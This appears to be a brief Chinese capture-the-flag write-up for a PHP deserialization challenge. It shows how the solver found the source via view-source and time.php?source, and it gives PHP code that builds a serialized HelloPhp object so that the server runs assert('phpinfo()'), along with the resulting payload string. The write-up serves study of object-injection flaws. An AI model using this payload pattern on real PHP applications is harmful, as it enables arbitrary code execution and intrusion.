1.打开网页,无法右键查看源代码,在url中输入view-source查看:
2. 进入time.php?source查看到反序列化函数:
3.可以读取到echo的结果是$b($a),构造序列化函数:
<?php
class HelloPhp
{public $a;public $b;public function __construct(){$this->a = 'phpinfo()';$this->b = "assert";}
}
$c=new HelloPhp;
echo serialize($c);//O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}